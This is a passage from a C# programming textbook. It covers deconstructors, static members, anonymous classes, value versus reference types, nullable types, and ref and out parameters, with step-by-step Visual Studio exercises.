Point bottomRight = new Point(1366, 768);
double distance = origin.DistanceTo(bottomRight);
Console.WriteLine($"Distance is: ");
}
8. On the Debug menu, click Start Without Debugging.
9. Confirm that the value 1568.45465347265 is written to the console
window and then press Enter to close the application and return to
Visual Studio 2017.
Deconstructing an object
You use a constructor to create and initialize an object, typically by
populating any fields it contains. A deconstructor enables you to examine an
object and extract the values of its fields. Taking the Point class from the
previous exercise as an example, you can implement a deconstructor that
retrieves the values of the x and y fields like this:
class Point
{
private int x, y;
...
public void Deconstruct(out int x, out int y)
{
x = this.x;
y = this.y;
}
}
You should note the following points about a deconstructor:
It is always named Deconstruct.
It must be a void method.
It must take one or more parameters. These parameters will be
populated with the values from the fields in the objects.
The parameters are marked with the out modifier. This means that if
you assign values to them, these values will be passed back to the
caller (you will learn more about out parameters in Chapter 8,
“Understanding values and references”).
The code in the body of the method assigns the values to be returned to
the parameters.
You call the deconstructor in a manner similar to that used to call a
method that returns a tuple (described in Chapter 3, “Writing methods and
applying scope”). You simply create a tuple and assign an object to it, like
this:
Point origin = new Point();
...
(int xVal, int yVal) = origin;
Behind the scenes, C# runs the deconstructor and passes it the variables
defined in the tuple as the parameters. The code in the deconstructor
populates these variables. Assuming that you have not modified the default
constructor for the Point class, the xVal and yVal variables should both
contain the value -1.
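Putting these pieces together, a minimal sketch of calling the deconstructor might look like this (assuming the Point class shown above):
Point origin = new Point();                 // the default constructor sets x and y to -1
(int xVal, int yVal) = origin;              // invokes Deconstruct(out xVal, out yVal)
Console.WriteLine($"x: {xVal}, y: {yVal}"); // displays x: -1, y: -1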
Note Remember that you must add the System.ValueTuple package to
your application if you want to use tuples. Revisit Chapter 3 to remind
yourself how to do this using the NuGet Package Manager.
Besides deconstructors, there are other ways to retrieve the values held by
the fields in an object. Chapter 15, “Implementing properties to access fields”
describes another very common strategy.
Understanding static methods and data
In the preceding exercise, you used the Sqrt method of the Math class.
Similarly, when looking at the Circle class, you read the PI field of the Math
class. If you think about it, the way in which you called the Sqrt method or
read the PI field was slightly odd. You invoked the method or read the field
on the class itself, not on an object of type Math. It is like trying to write
Point.DistanceTo rather than origin.DistanceTo in the code you added in the
preceding exercise. So what’s happening, and how does this work?
You will often find that not all methods naturally belong to an instance of
a class; they are utility methods since they provide a useful function that is
independent of any specific class instance. The WriteLine method of the
Console class that has been used extensively throughout this book is a
common example. The Sqrt method is another example. If Sqrt were an
instance method of Math, you’d have to create a Math object on which to call
Sqrt:
Math m = new Math();
double d = m.Sqrt(42.24);
This would be cumbersome. The Math object would play no part in the
calculation of the square root. All the input data that Sqrt needs is provided in
the parameter list, and the result is passed back to the caller by using the
method’s return value. Objects are not really needed here, so forcing Sqrt into
an instance straitjacket is just not a good idea.
Note As well as containing the Sqrt method and the PI field, the Math
class contains many other mathematical utility methods, such as Sin,
Cos, Tan, and Log.
In C#, all methods must be declared within a class. However, if you
declare a method or a field as static, you can call the method or access the
field by using the name of the class. No instance is required. This is how the
Sqrt method of the Math class is declared:
class Math
{
public static double Sqrt(double d)
{
...
}
...
}
You can invoke the Sqrt method like this:
double d = Math.Sqrt(42.24);
A static method does not depend on an instance of the class, and it cannot
access any instance fields or instance methods defined in the class; it can use
only fields and other methods that are marked as static.
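The following sketch (a hypothetical class) shows this restriction; the static method can modify the static field, but uncommenting the line that touches the instance field would cause a compile-time error:
class Counter
{
    private int instanceCount = 0;
    private static int sharedCount = 0;

    public static void Increment()
    {
        sharedCount++;      // OK: a static field
        // instanceCount++; // Compile-time error: no instance is available
    }
}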
Creating a shared field
Defining a field as static makes it possible for you to create a single instance
of a field that is shared among all objects created from a single class.
(Nonstatic fields are local to each instance of an object.) In the following
example, the static field NumCircles in the Circle class is incremented by the
Circle constructor every time a new Circle object is created:
class Circle
{
private int radius;
public static int NumCircles = 0;
public Circle() // default constructor
{
radius = 0;
NumCircles++;
}
public Circle(int initialRadius) // overloaded constructor
{
radius = initialRadius;
NumCircles++;
}
}
All Circle objects share the same instance of the NumCircles field, so the
statement NumCircles++; increments the same data every time a new
instance is created. Notice that you cannot prefix NumCircles with the this
keyword because NumCircles does not belong to a specific object.
You can access the NumCircles field from outside the class by specifying
the Circle class rather than a Circle object, such as in the following example:
Console.WriteLine($"Number of Circle objects: {Circle.NumCircles}");
Note Keep in mind that static methods are also called class methods.
However, static fields aren’t usually called class fields; they’re just
called static fields (or sometimes static variables).
Creating a static field by using the const keyword
By prefixing the field with the const keyword, you can declare that a field is
static but that its value can never change. The keyword const is short for
constant. A const field does not use the static keyword in its declaration but
is nevertheless static. However, for reasons that are beyond the scope of this
book, you can declare a field as const only when the field is a numeric type
(such as int or double), a string, or an enumeration. (You will learn about
enumerations in Chapter 9, “Creating value types with enumerations and
structures.”) For example, here’s how the Math class declares PI as a const
field:
class Math
{
...
public const double PI = 3.14159265358979;
}
Understanding static classes
Another feature of the C# language is the ability to declare a class as static. A
static class can contain only static members. (All objects that you create by
using the class share a single copy of these members.) The purpose of a static
class is purely to act as a holder of utility methods and fields. A static class
cannot contain any instance data or methods, and it does not make sense to
try to create an object from a static class by using the new operator. In fact,
you can’t actually use new to create an instance of an object using a static
class even if you want to. (The compiler will report an error if you try.) If you
need to perform any initialization, a static class can have a default constructor
as long as it is also declared as static. Any other types of constructor are
illegal and will be reported as such by the compiler.
If you were defining your own version of the Math class, one containing
only static members, it could look like this:
public static class Math
{
public static double Sin(double x) {...}
public static double Cos(double x) {...}
public static double Sqrt(double x) {...}
...
}
Note The real Math class is not defined this way because it actually
does have some instance methods.
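If a static class does need initialization, it can define a static constructor, as mentioned earlier. The following sketch (a hypothetical Utility class) shows the syntax; note that a static constructor takes no access modifier and no parameters:
public static class Utility
{
    public static readonly DateTime Started;

    static Utility() // runs once, before the class is first used
    {
        Started = DateTime.Now;
    }
}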
Static using statements
Whenever you call a static method or reference a static field, you must
specify the class to which the method or field belongs, such as Math.Sqrt or
Console.WriteLine. Static using statements enable you to bring a class into
scope and omit the class name when accessing static members. They operate
in much the same way as ordinary using statements that bring namespaces
into scope. The following example illustrates how to use them:
using static System.Math;
using static System.Console;
...
var root = Sqrt(99.9);
WriteLine($"The square root of 99.9 is ");
Note the use of the keyword static in the using statements. The example
brings the static methods of the System.Math and System.Console classes into
scope (you have to fully qualify the classes with their namespaces). You can
then simply call the Sqrt and WriteLine methods. The compiler works out to
which class each method belongs. However, herein lies a potential
maintenance issue. Although you are typing less code, you have to balance
this with the additional effort required when someone else has to maintain
your code, because it is no longer clear to which class each method belongs.
IntelliSense in Visual Studio helps to some extent, but to a developer reading
through the code, it can obfuscate matters when the developer is trying to
track down the causes of bugs. Use static using statements carefully; the
preferred style of the author is not to utilize them, although you are free to
make your own choice!
In the final exercise in this chapter, you will add a private static field to
the Point class and initialize the field to 0. You will increment this count in
both constructors. Finally, you will write a public static method to return the
value of this private static field. With this field, you can find out how many
Point objects you have created.
Write static members and call static methods
1. In Visual Studio 2017, display the Point class in the Code and Text
Editor window.
2. Add a private static field called objectCount of type int to the Point class
immediately before the first constructor. Initialize it to 0 as you declare
it, like this:
class Point
{
private int x, y;
private static int objectCount = 0;
public Point()
{
...
}
...
}
Note You can write the keywords private and static in any order
when you declare a field such as objectCount. However, the
preferred order is private first, static second.
3. Add a statement to both Point constructors to increment the objectCount
field, as shown in bold type in the code example that follows.
The Point class should now look like this:
class Point
{
private int x, y;
private static int objectCount = 0;
public Point()
{
this.x = -1;
this.y = -1;
objectCount++;
}
public Point(int x, int y)
{
this.x = x;
this.y = y;
objectCount++;
}
...
}
Each time an object is created, its constructor is called. As long as you
increment the objectCount in each constructor (including the default
constructor), objectCount will hold the number of objects created so far.
This strategy works only because objectCount is a shared static field. If
objectCount were an instance field, each object would have its own
personal objectCount field that would be set to 1.
The question now is this: How can users of the Point class find out how
many Point objects have been created? At the moment, the objectCount
field is private and not available outside the class. A poor solution would
be to make the objectCount field publicly accessible. This strategy
would break the encapsulation of the class, and you would then have no
guarantee that the objectCount field’s value was correct because anyone
could change the value in the field. A much better idea is to provide a
public static method that returns the value of the objectCount field. This
is what you will do now.
4. Add a public static method to the end of Point class called ObjectCount
that returns an int but does not take any parameters. This method should
return the value of the objectCount field, as shown in bold type here:
class Point
{
...
public static int ObjectCount() => objectCount;
}
5. Display the Program class in the Code and Text Editor window. Add a
statement to the doWork method to write the value returned from the
ObjectCount method of the Point class to the screen, as shown in bold
type in the following code example:
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
double distance = origin.DistanceTo(bottomRight);
Console.WriteLine($"Distance is: {distance}");
Console.WriteLine($"Number of Point objects: {Point.ObjectCount()}");
}
The ObjectCount method is called by referencing Point, the name of the
class, and not the name of a Point variable (such as origin or
bottomRight). Because two Point objects have been created by the time
ObjectCount is called, the method should return the value 2.
6. On the Debug menu, click Start Without Debugging.
Confirm that the message “Number of Point objects: 2” is written to the
console window (after the message displaying the value of the distance
variable).
7. Press Enter to close the program and return to Visual Studio 2017.
Anonymous classes
An anonymous class is a class that does not have a name. This sounds rather
strange, but it is actually quite handy in some situations that you will see later
in this book, especially when using query expressions. (You learn about
query expressions in Chapter 20, “Decoupling application logic and handling
events.”) For the time being, you’ll have to take it on faith that they are
useful.
You create an anonymous class simply by using the new keyword and a
pair of braces defining the fields and values that you want the class to
contain, like this:
myAnonymousObject = new { Name = "John", Age = 47 };
This class contains public fields called Name (initialized to the string
“John”) and Age (initialized to the integer 47). The compiler infers the types
of the fields from the types of the data you specify to initialize them.
When you define an anonymous class, the compiler generates its own
name for the class, but it won’t tell you what it is. Anonymous classes,
therefore, raise a potentially interesting conundrum: if you don’t know the
name of the class, how can you create an object of the appropriate type and
assign an instance of the class to it? In the code example shown earlier, what
should the type of the variable myAnonymousObject be? The answer is that
you don’t know—that is the point of anonymous classes! However, this is not
a problem if you declare myAnonymousObject as an implicitly typed variable
by using the var keyword, like this:
var myAnonymousObject = new { Name = "John", Age = 47 };
Remember that the var keyword causes the compiler to create a variable
of the same type as the expression used to initialize it. In this case, the type of
the expression is whatever name the compiler happens to generate for the
anonymous class.
You can access the fields in the object by using the familiar dot notation,
as demonstrated here:
Console.WriteLine($"Name: {myAnonymousObject.Name} Age:
{myAnonymousObject.Age}"};
You can even create other instances of the same anonymous class but with
different values, such as in the following:
var anotherAnonymousObject = new { Name = "Diana", Age = 53 };
The C# compiler uses the names, types, number, and order of the fields to
determine whether two instances of an anonymous class have the same type.
In this case, the variables myAnonymousObject and
anotherAnonymousObject have the same number of fields, with the same
name and type, in the same order, so both variables are instances of the same
anonymous class. This means that you can perform assignment statements
such as this:
Click here to view code image
anotherAnonymousObject = myAnonymousObject;
Note Be warned that this assignment statement might not accomplish
what you expect to happen! You’ll learn more about assigning object
variables in Chapter 8.
There are quite a few restrictions on the contents of an anonymous class.
For example, anonymous classes can contain only public fields, the fields
must all be initialized, they cannot be static, and you cannot define any
methods for them. You will use anonymous classes periodically throughout
this book and learn more about them as you do so.
Summary
In this chapter, you saw how to define new classes. You learned that by
default the fields and methods of a class are private and inaccessible to code
outside the class, but you can use the public keyword to expose fields and
methods to the outside world. You saw how to use the new keyword to create
a new instance of a class and how to define constructors that can initialize
class instances. Finally, you saw how to implement static fields and methods
to provide data and operations that are independent of any specific instance
of a class.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 8.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare a
class
Write the keyword class, followed by the name of the class,
followed by opening and closing braces. The methods and
fields of the class are declared between the opening and closing
braces. For example:
class Point
{
...
}
Declare a
constructor
Write a method whose name is the same as the name of the
class, and that has no return type (not even void). For example:
class Point
{
public Point(int x, int y)
{
...
}
}
Call a
constructor
Use the new keyword and specify the constructor with an
appropriate set of parameters. For example:
Point origin = new Point(0, 0);
Declare a
static
method
Write the keyword static before the declaration of the method.
For example:
class Point
{
public static int ObjectCount()
{
...
}
}
Call a
static
method
Write the name of the class, followed by a period, followed by
the name of the method. For example:
int pointsCreatedSoFar = Point.ObjectCount();
Declare a
static field
Use the keyword static before the type of the field. For
example:
class Point
{
...
private static int objectCount;
}
Declare a
const field
Write the keyword const before the declaration of the field and
omit the static keyword. For example:
class Math
{
...
public const double PI = ...;
}
Access a
static field
Write the name of the class, followed by a period, followed by
the name of the static field. For example:
double area = Math.PI * radius * radius;
CHAPTER 8
Understanding values and
references
After completing this chapter, you will be able to:
Explain the differences between a value type and a reference type.
Modify the way in which arguments are passed as method parameters
by using the ref and out keywords.
Convert a value into a reference by using boxing.
Convert a reference back to a value by using unboxing and casting.
Chapter 7, “Creating and managing classes and objects,” demonstrates how
to declare your own classes and how to create objects by using the new
keyword. That chapter also shows you how to initialize an object by using a
constructor. In this chapter, you will learn how the characteristics of the
primitive types—such as int, double, and char—differ from the
characteristics of class types.
Copying value type variables and classes
Most of the primitive types built into C#, such as int, float, double, and char
(but not string, for reasons that will be covered shortly) are collectively called
value types. These types have a fixed size, and when you declare a variable as
a value type, the compiler generates code that allocates a block of memory
big enough to hold a corresponding value. For example, declaring an int
variable causes the compiler to allocate 4 bytes of memory (32 bits) to hold
the integer value. A statement that assigns a value (such as 42) to the int
causes the value to be copied into this block of memory.
Class types such as Circle (described in Chapter 7) are handled
differently. When you declare a Circle variable, the compiler does not
generate code that allocates a block of memory big enough to hold a Circle;
all it does is allot a small piece of memory that can potentially hold the
address of (or a reference to) another block of memory containing a Circle.
(An address specifies the location of an item in memory.) The memory for
the actual Circle object is allocated only when the new keyword is used to
create the object. A class is an example of a reference type. Reference types
hold references to blocks of memory. To write effective C# programs that
make full use of the Microsoft .NET Framework, you need to understand the
difference between value types and reference types.
Note The string type in C# is actually a class. This is because there is
no standard size for a string (different strings can contain different
numbers of characters), and allocating memory for a string dynamically
when the program runs is far more efficient than doing so statically at
compile time. The description in this chapter of reference types such as
classes applies to the string type as well. In fact, the string keyword in
C# is just an alias for the System.String class.
Consider a situation in which you declare a variable named i as an int and
assign it the value 42. If you declare another variable called copyi as an int
and then assign i to copyi, copyi will hold the same value as i (42). However,
even though copyi and i happen to hold the same value, two blocks of
memory contain the value 42: one block for i and the other block for copyi. If
you modify the value of i, the value of copyi does not change. Let’s see this
in code:
int i = 42; // declare and initialize i
int copyi = i; /* copyi contains a copy of the data in i:
i and copyi both contain the value 42 */
i++; /* incrementing i has no effect on copyi;
i now contains 43, but copyi still contains 42 */
The effect of declaring a variable c as a class type, such as Circle, is very
different. When you declare c as a Circle, c can refer to a Circle object; the
actual value held by c is the address of a Circle object in memory. If you
declare an additional variable named refc (also as a Circle) and you assign c
to refc, refc will have a copy of the same address as c; in other words, there is
only one Circle object, and both refc and c now refer to it. Here’s the
example in code:
Circle c = new Circle(42);
Circle refc = c;
The following illustration shows both examples. The at sign (@) in the
Circle objects represents a reference holding an address in memory:
This difference is very important. In particular, it means that the behavior
of method parameters depends on whether they are value types or reference
types. You’ll explore this difference in the next exercise.
Copying reference types and data privacy
If you actually want to copy the contents of a Circle object, c, into a
different Circle object, refc, instead of just copying the reference, you
must make refc refer to a new instance of the Circle class and then copy
the data, field by field, from c into refc, like this:
Circle refc = new Circle();
refc.radius = c.radius; // Don't try this
However, if any members of the Circle class are private (like the
radius field), you will not be able to copy this data. Instead, you can
make the data in the private fields accessible by exposing them as
properties and then use these properties to read the data from c and copy
it into refc. You will learn how to do this in Chapter 15, “Implementing
properties to access fields.”
Alternatively, a class could provide a Clone method that returns
another instance of the same class but populated with the same data.
The Clone method would have access to the private data in an object
and could copy this data directly to another instance of the same class.
For example, the Clone method for the Circle class could be defined as
shown here:
class Circle
{
private int radius;
// Constructors and other methods omitted
...
public Circle Clone()
{
// Create a new Circle object
Circle clone = new Circle();
// Copy private data from this to clone
clone.radius = this.radius;
// Return the new Circle object containing the copied data
return clone;
}
}
This approach is straightforward if all the private data consists of
values, but if one or more fields are themselves reference types (for
example, the Circle class might be extended to contain a Point object
from Chapter 7, indicating the position of the Circle on a graph), these
reference types also need to provide a Clone method; otherwise, the
Clone method of the Circle class will simply copy a reference to these
fields. This process is known as a deep copy. The alternative approach,
wherein the Clone method simply copies references, is known as a
shallow copy.
The preceding code example also poses an interesting question: How
private is private data? Previously, you saw that the private keyword
renders a field or method inaccessible from outside a class. However,
this does not mean it can be accessed by only a single object. If you
create two objects of the same class, they can each access the private
data of the other within the code for that class. This sounds curious, but
in fact, methods such as Clone depend on this feature. The statement
clone.radius = this.radius; works only because the private radius field
in the clone object is accessible from within the current instance of the
Circle class. So, private actually means “private to the class” rather than
“private to an object.” However, don’t confuse private with static. If
you simply declare a field as private, each instance of the class gets its
own data. If a field is declared as static, each instance of the class shares
the same data.
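As a brief illustration of this scoping rule, the following sketch adds a hypothetical HasSameRadius method to the Circle class. It compiles even though it reads the private radius field of a different Circle object:

class Circle
{
    private int radius;

    public bool HasSameRadius(Circle other)
    {
        // Legal: radius is private to the Circle class, not to each object
        return this.radius == other.radius;
    }
}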
Use value parameters and reference parameters
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Parameters solution, which is located in the \Microsoft
Press\VCSBS\Chapter 8\Parameters folder in your Documents folder.
The project contains three C# code files: Pass.cs, Program.cs, and
WrappedInt.cs.
3. Display the Pass.cs file in the Code and Text Editor window.
This file defines a class called Pass that is currently empty apart from a
// TODO: comment.
Tip Remember that you can use the Task List window to locate all
TODO comments in a solution.
4. Add a public static method called Value to the Pass class, replacing the
// TODO: comment. This method should accept a single int parameter (a
value type) called param and have the return type void. The body of the
Value method should simply assign the value 42 to param, as shown in
bold type in the following code example:
namespace Parameters
{
    class Pass
    {
        public static void Value(int param)
        {
            param = 42;
        }
    }
}
Note The reason you are defining this method using the static
keyword is to keep the exercise simple. You can call the Value
method directly on the Pass class without first creating a new Pass
object. The principles illustrated in this exercise apply in the same
manner to instance methods.
5. Display the Program.cs file in the Code and Text Editor window and
then locate the doWork method of the Program class.
The doWork method is called by the Main method when the program
starts running. As explained in Chapter 7, the method call is wrapped in
a try block and followed by a catch handler.
6. Add four statements to the doWork method to perform the following
tasks:
a. Declare a local int variable called i and initialize it to 0.
b. Write the value of i to the console by using Console.WriteLine.
c. Call Pass.Value, passing i as an argument.
d. Write the value of i to the console again.
By running Console.WriteLine before and after the call to Pass.Value,
you can see whether the Pass.Value method actually modifies the value
of i. The completed doWork method should look exactly like this:
static void doWork()
{
    int i = 0;
    Console.WriteLine(i);
    Pass.Value(i);
    Console.WriteLine(i);
}
7. On the Debug menu, click Start Without Debugging to build and run the
program.
8. Confirm that the value “0” is written to the console window twice.
The assignment statement inside the Pass.Value method that updates the
parameter and sets it to 42 uses a copy of the argument passed in, and
the original argument i is completely unaffected.
9. Press the Enter key to close the application.
You will now see what happens when you pass an int parameter that is
wrapped within a class.
10. Display the WrappedInt.cs file in the Code and Text Editor window.
This file contains the WrappedInt class, which is empty apart from a //
TODO: comment.
11. Add a public instance field called Number of type int to the WrappedInt
class, as shown in bold type in the following code:
namespace Parameters
{
    class WrappedInt
    {
        public int Number;
    }
}
12. Display the Pass.cs file in the Code and Text Editor window. Add a
public static method called Reference to the Pass class. This method
should accept a single WrappedInt parameter called param and have the
return type void. The body of the Reference method should assign 42 to
param.Number, as shown here:
public static void Reference(WrappedInt param)
{
    param.Number = 42;
}
13. Display the Program.cs file in the Code and Text Editor window.
Comment out the existing code in the doWork method and add four
more statements to perform the following tasks:
a. Declare a local WrappedInt variable called wi and initialize it to a new
WrappedInt object by calling the default constructor.
b. Write the value of wi.Number to the console.
c. Call the Pass.Reference method, passing wi as an argument.
d. Write the value of wi.Number to the console again.
As before, with the calls to Console.WriteLine, you can see whether the
call to Pass.Reference modifies the value of wi.Number. The doWork
method should now look exactly like this (the new statements are
highlighted in bold type):
static void doWork()
{
    // int i = 0;
    // Console.WriteLine(i);
    // Pass.Value(i);
    // Console.WriteLine(i);
    WrappedInt wi = new WrappedInt();
    Console.WriteLine(wi.Number);
    Pass.Reference(wi);
    Console.WriteLine(wi.Number);
}
14. On the Debug menu, click Start Without Debugging to build and run the
application.
This time, the two values displayed in the console window correspond to
the value of wi.Number before and after the call to the Pass.Reference
method. You should see that the values 0 and 42 are displayed.
15. Press the Enter key to close the application and return to Visual Studio
2017.
To explain what the previous exercise shows, the value of wi.Number is
initialized to 0 by the compiler-generated default constructor. The wi variable
contains a reference to the newly created WrappedInt object (which contains
an int). The wi variable is then copied as an argument to the Pass.Reference
method. Because WrappedInt is a class (a reference type), wi and param both
refer to the same WrappedInt object. Any changes made to the contents of the
object through the param variable in the Pass.Reference method are visible
by using the wi variable when the method completes. The following diagram
illustrates what happens when a WrappedInt object is passed as an argument
to the Pass.Reference method:
Understanding null values and nullable types
When you declare a variable, it is always a good idea to initialize it. With
value types, it is common to see code such as this:
int i = 0;
double d = 0.0;
Remember that to initialize a reference variable such as a class, you can
create a new instance of the class and assign the reference variable to the new
object, like this:
Circle c = new Circle(42);
This is all very well, but what if you don’t actually want to create a new
object? Perhaps the purpose of the variable is simply to store a reference to an
existing object at some later point in your program. In the following code
example, the Circle variable copy is initialized, but later it is assigned a
reference to another instance of the Circle class:
Circle c = new Circle(42);
Circle copy = new Circle(99); // Some random value, for initializing copy
...
copy = c; // copy and c refer to the same object
After assigning c to copy, what happens to the original Circle object with
a radius of 99 that you used to initialize copy? Nothing refers to it anymore.
In this situation, the runtime can reclaim the memory by performing an
operation known as garbage collection, which you will learn more about in
Chapter 14, “Using garbage collection and resource management.” The
important thing to understand for now is that garbage collection is a
potentially time-consuming operation; you should not create objects that are
never used because doing so is a waste of time and resources.
You could argue that if a variable is going to be assigned a reference to
another object at some point in a program, there is no point to initializing it.
But this is poor programming practice, which can lead to problems in your
code. For example, you will inevitably find yourself in the situation in which
you want to refer a variable to an object only if that variable does not already
contain a reference, as shown in the following code example:
Circle c = new Circle(42);
Circle copy; // Uninitialized !!!
...
if (copy == /* only assign to copy if it is uninitialized, but what goes here? */)
{
    copy = c; // copy and c refer to the same object
    ...
}
The purpose of the if statement is to test the copy variable to see whether it
is initialized, but to which value should you compare this variable? The
answer is to use a special value called null.
In C#, you can assign the null value to any reference variable. The null
value simply means that the variable does not refer to an object in memory.
You can use it like this:
Circle c = new Circle(42);
Circle copy = null; // Initialized
...
if (copy == null)
{
    copy = c; // copy and c refer to the same object
    ...
}
The null-conditional operator
The null-conditional operator enables you to test for null values very
succinctly. To use the null-conditional operator, you append a question mark
(?) to the name of your variable.
For example, suppose you attempt to call the Area method on a Circle
object when the Circle object has a null value:
Circle c = null;
Console.WriteLine($"The area of circle c is {c.Area()}");
In this case, the Circle.Area method throws a NullReferenceException,
which makes sense because you cannot calculate the area of a circle that does
not exist.
To avoid this exception, you could test whether the Circle object is null
before you attempt to call the Circle.Area method:
if (c != null)
{
    Console.WriteLine($"The area of circle c is {c.Area()}");
}
In this case, if c is null, nothing is written to the command window.
Alternatively, you could use the null-conditional operator on the Circle object
before you attempt to call the Circle.Area method:
Console.WriteLine($"The area of circle c is {c?.Area()}");
The null-conditional operator tells the C# runtime to ignore the current
statement if the variable to which you have applied the operator is null. In
this case, the command window would display the following text:
The area of circle c is
Both approaches are valid and might meet your needs in different
scenarios. The null-conditional operator can help you keep your code
concise, particularly when you deal with complex properties with nested
reference types that could all be null valued.
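For example, given a hypothetical order variable whose type exposes a Customer property, which in turn exposes an Address property with a City, a single null-conditional chain guards every link (the type and property names here are invented for illustration):

// If order, order.Customer, or order.Customer.Address is null,
// the whole expression evaluates to null instead of throwing.
string city = order?.Customer?.Address?.City;
Console.WriteLine(city);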
Using nullable types
The null value is very useful for initializing reference types. Sometimes, you
need an equivalent value for value types, but null is itself a reference, so you
cannot assign it to a value type. The following statement is therefore illegal in
C#:
int i = null; // illegal
However, C# defines a modifier that you can use to declare that a variable
is a nullable value type. A nullable value type behaves similarly to the
original value type, but you can assign the null value to it. You use the
question mark (?) to indicate that a value type is nullable, like this:
int? i = null; // legal
You can ascertain whether a nullable variable contains null by testing it in
the same way as you test a reference type.
if (i == null)
...
You can assign an expression of the appropriate value type directly to a
nullable variable. The following examples are all legal:
int? i = null;
int j = 99;
i = 100; // Copy a value type constant to a nullable type
i = j; // Copy a value type variable to a nullable type
You should note that the converse is not true. You cannot assign a
nullable variable to an ordinary value type variable. So, given the definitions
of variables i and j from the preceding example, the following statement is
not allowed:
j = i; // Illegal
This makes sense when you consider that the variable i might contain null,
and j is a value type that cannot contain null. This also means that you cannot
use a nullable variable as a parameter to a method that expects an ordinary
value type. If you recall, the Pass.Value method from the preceding exercise
expects an ordinary int parameter, so the following method call will not
compile:
int? i = 99;
Pass.Value(i); // Compiler error
Note Take care not to confuse nullable types with the null-conditional
operator. Nullable types are indicated by appending a question mark to
the type name, whereas the null-conditional operator is appended to the
variable name.
Understanding the properties of nullable types
A nullable type exposes a pair of properties that you can use to determine
whether the type actually has a nonnull value and what this value is. The
HasValue property indicates whether a nullable type contains a value or is
null. You can retrieve the value of a nonnull nullable type by reading the
Value property, like this:
int? i = null;
...
if (!i.HasValue)
{
    // If i is null, then assign it the value 99
    i = 99;
}
else
{
    // If i is not null, then display its value
    Console.WriteLine(i.Value);
}
In Chapter 4, “Using decision statements,” you saw that the NOT operator
(!) negates a Boolean value. The code fragment above tests the nullable
variable i, and if it does not have a value (it is null), it assigns it the value 99;
otherwise, it displays the value of the variable. In this example, using the
HasValue property does not provide any benefit over testing for a null value
directly. Additionally, reading the Value property is a long-winded way of
reading the contents of the variable. However, these apparent shortcomings
are caused by the fact that int? is a very simple nullable type. You can create
more complex value types and use them to declare nullable variables where
the advantages of using the HasValue and Value properties become more
apparent. You will see some examples in Chapter 9, “Creating value types
with enumerations and structures.”
Note The Value property of a nullable type is read-only. You can use
this property to read the value of a variable but not to modify it. To
update a nullable variable, use an ordinary assignment statement.
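For example, this short sketch updates a nullable variable through ordinary assignment; writing through the Value property would not compile:

int? i = 99;
i = i + 1;        // legal: ordinary assignment (i is now 100)
// i.Value = 100; // illegal: Value is read-only
Console.WriteLine(i.Value); // writes '100'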
Using ref and out parameters
Ordinarily, when you pass an argument to a method, the corresponding
parameter is initialized with a copy of the argument. This is true regardless of
whether the parameter is a value type (such as an int), a nullable type (such as
int?), or a reference type (such as a WrappedInt). This arrangement means
that it’s impossible for any change to the parameter to affect the value of the
argument passed in. For example, in the following code, the value output to
the console is 42, not 43. The doIncrement method increments a copy of the
argument (arg) and not the original argument, as demonstrated here:
static void doIncrement(int param)
{
    param++;
}

static void Main()
{
    int arg = 42;
    doIncrement(arg);
    Console.WriteLine(arg); // writes 42, not 43
}
In the preceding exercise, you saw that if the parameter to a method is a
reference type, any changes made by using that parameter change the data
referenced by the argument passed in. The key point is this: Although the
data that was referenced changed, the argument passed in as the parameter
did not—it still references the same object. In other words, although it is
possible to modify the object that the argument refers to through the
parameter, it’s not possible to modify the argument itself (for example, to set
it to refer to a completely different object). Most of the time, this guarantee is
very useful and can help to reduce the number of bugs in a program.
Occasionally, however, you might want to write a method that actually needs
to modify an argument. C# provides the ref and out keywords so that you can
do this.
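To see the distinction in code, consider this minimal sketch using the WrappedInt class from the earlier exercise (the doReplace method is hypothetical). The method can re-point its own copy of the reference, but the original argument still refers to the original object:

static void doReplace(WrappedInt param)
{
    param = new WrappedInt(); // re-points only the local copy of the reference
    param.Number = 99;        // modifies the new object, not the original
}

static void Main()
{
    WrappedInt wi = new WrappedInt();
    doReplace(wi);
    Console.WriteLine(wi.Number); // writes '0': wi still refers to the original object
}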
Creating ref parameters
If you prefix a parameter with the ref keyword, the C# compiler generates
code that passes a reference to the actual argument rather than a copy of the
argument. When using a ref parameter, anything you do to the parameter you
also do to the original argument because the parameter and the argument both
reference the same data. When you pass an argument as a ref parameter, you
must also prefix the argument with the ref keyword. This syntax provides a
useful visual cue to the programmer that the argument might change. Here’s
the preceding example again, this time modified to use the ref keyword:
static void doIncrement(ref int param) // using ref
{
    param++;
}

static void Main()
{
    int arg = 42;
    doIncrement(ref arg); // using ref
    Console.WriteLine(arg); // writes 43
}
This time, the doIncrement method receives a reference to the original
argument rather than a copy, so any changes the method makes by using this
reference actually change the original value. That’s why the value 43 is
displayed on the console.
Remember that C# enforces the rule that you must assign a value to a
variable before you can read it. This rule also applies to method arguments;
you cannot pass an uninitialized value as an argument to a method even if an
argument is defined as a ref argument. For example, in the following
example, arg is not initialized, so this code will not compile. This failure
occurs because the statement param++; within the doIncrement method is
really an alias for the statement arg++;—and this operation is allowed only if
arg has a defined value:
static void doIncrement(ref int param)
{
    param++;
}

static void Main()
{
    int arg; // not initialized
    doIncrement(ref arg);
    Console.WriteLine(arg);
}
Creating out parameters
The compiler checks whether a ref parameter has been assigned a value
before calling the method. However, there might be times when you want the
method itself to initialize the parameter. You can do this with the out
keyword.
The out keyword is syntactically similar to the ref keyword. You can
prefix a parameter with the out keyword so that the parameter becomes an
alias for the argument. As when using ref, anything you do to the parameter,
you also do to the original argument. When you pass an argument to an out
parameter, you must also prefix the argument with the out keyword.
The keyword out is short for output. When you pass an out parameter to a
method, the method must assign a value to it before it finishes or returns, as
shown in the following example:
static void doInitialize(out int param)
{
    param = 42; // Initialize param before finishing
}
The following example does not compile because doInitialize does not
assign a value to param:
static void doInitialize(out int param)
{
    // Do nothing
}
Because an out parameter must be assigned a value by the method, you’re
allowed to call the method without initializing its argument. For example, the
following code calls doInitialize to initialize the variable arg, which is then
displayed on the console:
static void doInitialize(out int param)
{
    param = 42;
}

static void Main()
{
    int arg; // not initialized
    doInitialize(out arg); // legal
    Console.WriteLine(arg); // writes 42
}
Note You can combine the declaration of an out variable with its use as
a parameter rather than performing these tasks separately. For example,
you could replace the first two statements in the Main method in the
previous example with the single line of code:
doInitialize(out int arg);
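For instance, assuming the doInitialize method shown earlier, the combined form looks like this:

static void Main()
{
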